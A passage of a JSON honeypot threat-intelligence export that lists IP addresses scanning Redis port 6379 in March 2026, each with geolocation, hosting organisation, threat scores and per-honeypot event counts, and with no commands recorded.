        "Cowrie": 4,
        "Miniprint": 3,
        "Adbhoney": 2,
        "Redishoneypot": 2
      }
    },
    "182.253.116.35": {
      "attack_count": 9,
      "first_seen": "2026-03-09T17:36:07.000Z",
      "last_seen": "2026-03-09T17:37:15.663Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Indonesia",
      "country_code": "ID",
      "city": "Surabaya",
      "asn": 17451,
      "as_org": "BIZNET NETWORKS",
      "threat_score": 5.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.27
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-09T17:36:07+00:00",
        "last_seen_30d": "2026-03-09T17:37:15.663000+00:00",
        "days_since_last_seen": 22
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "20.207.238.171": {
      "attack_count": 9,
      "first_seen": "2026-03-31T07:30:57.000Z",
      "last_seen": "2026-03-31T07:32:06.947Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "India",
      "country_code": "IN",
      "city": "Jamnagar",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 18.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-31T07:30:57+00:00",
        "last_seen_30d": "2026-03-31T07:32:06.947000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "205.210.31.223": {
      "attack_count": 9,
      "first_seen": "2026-03-18T07:43:41.000Z",
      "last_seen": "2026-03-18T07:45:15.128Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 90.5,
      "threat_level": "critical",
      "score_components": {
        "frequency": 20.5,
        "persistence": 25,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 111,
        "days_active_30d": 30,
        "ports_targeted_30d": 33,
        "honeypots_triggered_30d": 6,
        "first_seen_30d": "2026-03-02T01:38:01+00:00",
        "last_seen_30d": "2026-03-31T13:29:55.933000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 74,
        "Honeytrap": 29,
        "Redishoneypot": 3,
        "Cowrie": 2,
        "Dionaea": 2,
        "Dicompot": 1
      }
    },
    "205.210.31.236": {
      "attack_count": 9,
      "first_seen": "2026-03-20T07:24:07.000Z",
      "last_seen": "2026-03-20T07:25:41.835Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 396982,
      "as_org": "Google LLC",
      "threat_score": 90.1,
      "threat_level": "critical",
      "score_components": {
        "frequency": 20.9,
        "persistence": 24.2,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 124,
        "days_active_30d": 29,
        "ports_targeted_30d": 30,
        "honeypots_triggered_30d": 6,
        "first_seen_30d": "2026-03-03T07:58:37+00:00",
        "last_seen_30d": "2026-03-31T06:29:34.146000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 75,
        "Honeytrap": 22,
        "ConPot": 18,
        "Mailoney": 5,
        "Redishoneypot": 3,
        "Dicompot": 1
      }
    },
    "40.117.230.15": {
      "attack_count": 9,
      "first_seen": "2026-03-08T06:17:33.000Z",
      "last_seen": "2026-03-08T06:18:41.755Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Washington",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 4.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.23
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-08T06:17:34+00:00",
        "last_seen_30d": "2026-03-08T06:18:41.755000+00:00",
        "days_since_last_seen": 23
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "44.220.188.60": {
      "attack_count": 9,
      "first_seen": "2026-03-27T10:10:50.000Z",
      "last_seen": "2026-03-27T10:11:54.169Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Ashburn",
      "asn": 14618,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 37.5,
      "threat_level": "low",
      "score_components": {
        "frequency": 14.3,
        "persistence": 10.0,
        "diversity": 4,
        "spread": 15,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 27,
        "days_active_30d": 12,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-16T17:35:10+00:00",
        "last_seen_30d": "2026-03-27T10:11:54.169000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 15,
        "Honeytrap": 9,
        "Redishoneypot": 3
      }
    },
    "52.142.28.18": {
      "attack_count": 9,
      "first_seen": "2026-03-05T08:02:28.000Z",
      "last_seen": "2026-03-05T08:03:34.847Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Washington",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 13.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 7.8,
        "persistence": 8.3,
        "diversity": 4,
        "spread": 10,
        "recency_factor": 0.43
      },
      "reputation_metrics": {
        "total_events_30d": 6,
        "days_active_30d": 10,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-05T08:02:29+00:00",
        "last_seen_30d": "2026-03-14T11:54:45.757000+00:00",
        "days_since_last_seen": 17
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 3
      }
    },
    "54.186.123.97": {
      "attack_count": 9,
      "first_seen": "2026-03-03T08:56:13.000Z",
      "last_seen": "2026-03-03T08:57:38.133Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Boardman",
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 1.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-03T08:56:13+00:00",
        "last_seen_30d": "2026-03-03T08:57:38.133000+00:00",
        "days_since_last_seen": 28
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "68.178.168.233": {
      "attack_count": 9,
      "first_seen": "2026-03-02T09:49:57.000Z",
      "last_seen": "2026-03-02T09:50:59.745Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 26496,
      "as_org": "GoDaddy.com, LLC",
      "threat_score": 1.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T09:49:57+00:00",
        "last_seen_30d": "2026-03-02T09:50:59.745000+00:00",
        "days_since_last_seen": 29
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "8.136.28.197": {
      "attack_count": 9,
      "first_seen": "2026-03-25T21:31:23.000Z",
      "last_seen": "2026-03-25T21:32:25.423Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Hangzhou",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 15.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 6.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.8
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-25T21:31:23+00:00",
        "last_seen_30d": "2026-03-25T21:32:25.423000+00:00",
        "days_since_last_seen": 6
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 3,
        "Suricata": 1
      }
    },
    "112.112.212.129": {
      "attack_count": 6,
      "first_seen": "2026-03-17T19:06:35.000Z",
      "last_seen": "2026-03-17T19:07:40.570Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4134,
      "as_org": "Chinanet",
      "threat_score": 4.2,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.53
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-17T19:07:40.570000+00:00",
        "last_seen_30d": "2026-03-17T19:07:40.570000+00:00",
        "days_since_last_seen": 14
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "124.220.227.161": {
      "attack_count": 6,
      "first_seen": "2026-03-29T20:54:35.000Z",
      "last_seen": "2026-03-29T20:55:43.687Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shanghai",
      "asn": 45090,
      "as_org": "Shenzhen Tencent Computer Systems Company Limited",
      "threat_score": 7.3,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.93
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-29T20:55:43.687000+00:00",
        "last_seen_30d": "2026-03-29T20:55:43.687000+00:00",
        "days_since_last_seen": 2
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "134.199.157.197": {
      "attack_count": 6,
      "first_seen": "2026-03-16T09:00:10.000Z",
      "last_seen": "2026-03-16T09:01:14.331Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Australia",
      "country_code": "AU",
      "city": "Sydney",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 21.7,
      "threat_level": "low",
      "score_components": {
        "frequency": 17.5,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.5
      },
      "reputation_metrics": {
        "total_events_30d": 56,
        "days_active_30d": 1,
        "ports_targeted_30d": 56,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-16T09:01:11.274000+00:00",
        "last_seen_30d": "2026-03-16T09:01:52.172000+00:00",
        "days_since_last_seen": 15
      },
      "honeypot_breakdown_30d": {
        "Suricata": 56
      }
    },
    "136.144.253.66": {
      "attack_count": 6,
      "first_seen": "2026-03-30T06:25:49.000Z",
      "last_seen": "2026-03-30T06:26:54.432Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "The Netherlands",
      "country_code": "NL",
      "city": "De Waal",
      "asn": 20857,
      "as_org": "Signet B.V.",
      "threat_score": 7.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-30T06:26:54.432000+00:00",
        "last_seen_30d": "2026-03-30T06:26:54.432000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "188.214.133.176": {
      "attack_count": 6,
      "first_seen": "2026-03-09T16:52:26.000Z",
      "last_seen": "2026-03-09T16:53:31.037Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Lithuania",
      "country_code": "LT",
      "city": null,
      "asn": 16125,
      "as_org": "UAB Cherry Servers",
      "threat_score": 9.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 10.4,
        "persistence": 0.8,
        "diversity": 14,
        "spread": 10,
        "recency_factor": 0.27
      },
      "reputation_metrics": {
        "total_events_30d": 11,
        "days_active_30d": 1,
        "ports_targeted_30d": 7,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-09T16:52:58.129000+00:00",
        "last_seen_30d": "2026-03-09T16:57:57.710000+00:00",
        "days_since_last_seen": 22
      },
      "honeypot_breakdown_30d": {
        "Suricata": 10,
        "Honeytrap": 1
      }
    },
    "142.93.12.128": {
      "attack_count": 5,
      "first_seen": "2026-03-21T19:44:10.000Z",
      "last_seen": "2026-03-21T19:45:51.682Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 28.1,
      "threat_level": "low",
      "score_components": {
        "frequency": 13.4,
        "persistence": 1.7,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 22,
        "days_active_30d": 2,
        "ports_targeted_30d": 22,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-21T19:13:44.758000+00:00",
        "last_seen_30d": "2026-03-22T15:50:45.166000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Suricata": 22
      }
    },
    "143.198.190.148": {
      "attack_count": 5,
      "first_seen": "2026-03-14T02:50:35.000Z",
      "last_seen": "2026-03-14T02:52:12.624Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 17.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 12.8,
        "persistence": 1.7,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.43
      },
      "reputation_metrics": {
        "total_events_30d": 19,
        "days_active_30d": 2,
        "ports_targeted_30d": 19,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-13T15:49:23.058000+00:00",
        "last_seen_30d": "2026-03-14T04:25:09.562000+00:00",
        "days_since_last_seen": 17
      },
      "honeypot_breakdown_30d": {
        "Suricata": 19
      }
    },
    "143.42.1.34": {
      "attack_count": 5,
      "first_seen": "2026-03-20T12:36:12.000Z",
      "last_seen": "2026-03-20T12:37:17.447Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Cedar Knolls",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 72.0,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.0,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 160,
        "days_active_30d": 30,
        "ports_targeted_30d": 140,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T01:59:21.329000+00:00",
        "last_seen_30d": "2026-03-31T23:08:04.123000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 160
      }
    },
    "164.68.108.231": {
      "attack_count": 5,
      "first_seen": "2026-03-31T09:24:15.000Z",
      "last_seen": "2026-03-31T09:25:23.990Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "France",
      "country_code": "FR",
      "city": "Lauterbourg",
      "asn": 51167,
      "as_org": "Contabo GmbH",
      "threat_score": 7.8,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-31T09:25:23.990000+00:00",
        "last_seen_30d": "2026-03-31T09:25:23.990000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "167.248.133.122": {
      "attack_count": 5,
      "first_seen": "2026-03-15T00:07:37.000Z",
      "last_seen": "2026-03-15T00:09:13.621Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 53.7,
      "threat_level": "medium",
      "score_components": {
        "frequency": 29.9,
        "persistence": 18.3,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 972,
        "days_active_30d": 22,
        "ports_targeted_30d": 898,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:18:55.725000+00:00",
        "last_seen_30d": "2026-03-23T20:25:23.500000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 972
      }
    },
    "167.94.138.150": {
      "attack_count": 5,
      "first_seen": "2026-03-10T22:11:54.000Z",
      "last_seen": "2026-03-10T22:13:04.728Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 47.0,
      "threat_level": "medium",
      "score_components": {
        "frequency": 19.7,
        "persistence": 17.5,
        "diversity": 20,
        "spread": 10,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 93,
        "days_active_30d": 21,
        "ports_targeted_30d": 62,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T02:55:32.395000+00:00",
        "last_seen_30d": "2026-03-22T00:32:51.797000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Suricata": 92,
        "ConPot": 1
      }
    },
    "193.163.125.108": {
      "attack_count": 5,
      "first_seen": "2026-03-05T00:08:41.000Z",
      "last_seen": "2026-03-05T00:09:42.753Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United Kingdom",
      "country_code": "GB",
      "city": null,
      "asn": 211298,
      "as_org": "Driftnet Ltd",
      "threat_score": 16.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 16.4,
        "persistence": 8.3,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 44,
        "days_active_30d": 10,
        "ports_targeted_30d": 44,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T00:33:48.484000+00:00",
        "last_seen_30d": "2026-03-11T14:57:43.386000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Suricata": 44
      }
    },
    "193.163.125.25": {
      "attack_count": 5,
      "first_seen": "2026-03-29T03:25:50.000Z",
      "last_seen": "2026-03-29T03:26:56.232Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United Kingdom",
      "country_code": "GB",
      "city": null,
      "asn": 211298,
      "as_org": "Driftnet Ltd",
      "threat_score": 53.2,
      "threat_level": "medium",
      "score_components": {
        "frequency": 17.3,
        "persistence": 10.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 54,
        "days_active_30d": 13,
        "ports_targeted_30d": 53,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-19T21:56:17.605000+00:00",
        "last_seen_30d": "2026-03-31T21:23:06.158000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 54
      }
    },
    "194.58.114.139": {
      "attack_count": 5,
      "first_seen": "2026-03-10T16:14:35.000Z",
      "last_seen": "2026-03-10T16:15:53.239Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Russia",
      "country_code": "RU",
      "city": null,
      "asn": 197695,
      "as_org": "Domain names registrar REG.RU, Ltd",
      "threat_score": 2.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.3
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-10T16:15:53.239000+00:00",
        "last_seen_30d": "2026-03-10T16:15:53.239000+00:00",
        "days_since_last_seen": 21
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "200.171.87.44": {
      "attack_count": 5,
      "first_seen": "2026-03-06T08:30:15.000Z",
      "last_seen": "2026-03-06T08:31:22.752Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Brazil",
      "country_code": "BR",
      "city": "Mairipor\u00e3",
      "asn": 27699,
      "as_org": "TELEFONICA BRASIL S.A",
      "threat_score": 1.3,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.17
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-06T08:31:22.752000+00:00",
        "last_seen_30d": "2026-03-06T08:31:22.752000+00:00",
        "days_since_last_seen": 25
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "45.79.153.72": {
      "attack_count": 5,
      "first_seen": "2026-03-31T12:35:33.000Z",
      "last_seen": "2026-03-31T12:36:36.570Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Cedar Knolls",
      "asn": 63949,
      "as_org": "Akamai Connected Cloud",
      "threat_score": 72.5,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.5,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 179,
        "days_active_30d": 30,
        "ports_targeted_30d": 168,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T08:52:38.207000+00:00",
        "last_seen_30d": "2026-03-31T12:46:59.739000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 179
      }
    },
    "47.117.87.239": {
      "attack_count": 5,
      "first_seen": "2026-03-18T05:45:33.000Z",
      "last_seen": "2026-03-18T05:46:40.491Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Shanghai",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 4.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.57
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-18T05:46:40.491000+00:00",
        "last_seen_30d": "2026-03-18T05:46:40.491000+00:00",
        "days_since_last_seen": 13
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "8.131.102.67": {
      "attack_count": 5,
      "first_seen": "2026-03-11T01:36:39.000Z",
      "last_seen": "2026-03-11T01:37:48.847Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 2.6,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 0.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 1,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-11T01:37:48.847000+00:00",
        "last_seen_30d": "2026-03-11T01:37:48.847000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1
      }
    },
    "100.28.191.174": {
      "attack_count": 4,
      "first_seen": "2026-03-22T17:19:45.000Z",
      "last_seen": "2026-03-22T17:20:46.937Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Ashburn",
      "asn": 14618,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 88.7,
      "threat_level": "critical",
      "score_components": {
        "frequency": 23.7,
        "persistence": 25,
        "diversity": 20,
        "spread": 20,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 236,
        "days_active_30d": 30,
        "ports_targeted_30d": 79,
        "honeypots_triggered_30d": 4,
        "first_seen_30d": "2026-03-02T04:35:30.805000+00:00",
        "last_seen_30d": "2026-03-31T22:13:41.127000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 207,
        "Honeytrap": 25,
        "ConPot": 3,
        "Dionaea": 1
      }
    },
    "149.28.56.56": {
      "attack_count": 4,
      "first_seen": "2026-03-03T22:24:50.000Z",
      "last_seen": "2026-03-03T22:25:59.194Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Piscataway",
      "asn": 20473,
      "as_org": "The Constant Company, LLC",
      "threat_score": 4.2,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 16.0,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 0.1
      },
      "reputation_metrics": {
        "total_events_30d": 40,
        "days_active_30d": 1,
        "ports_targeted_30d": 40,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-03T22:13:43.726000+00:00",
        "last_seen_30d": "2026-03-03T22:32:44.392000+00:00",
        "days_since_last_seen": 28
      },
      "honeypot_breakdown_30d": {
        "Suricata": 40
      }
    },
    "157.230.232.186": {
      "attack_count": 4,
      "first_seen": "2026-03-31T02:24:41.000Z",
      "last_seen": "2026-03-31T02:25:51.510Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 66.7,
      "threat_level": "high",
      "score_components": {
        "frequency": 30,
        "persistence": 1.7,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 1893,
        "days_active_30d": 2,
        "ports_targeted_30d": 1902,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-30T22:08:51.487000+00:00",
        "last_seen_30d": "2026-03-31T02:31:53.868000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 1873,
        "Honeytrap": 19,
        "Sentrypeer": 1
      }
    },
    "167.71.103.100": {
      "attack_count": 4,
      "first_seen": "2026-03-07T03:36:22.000Z",
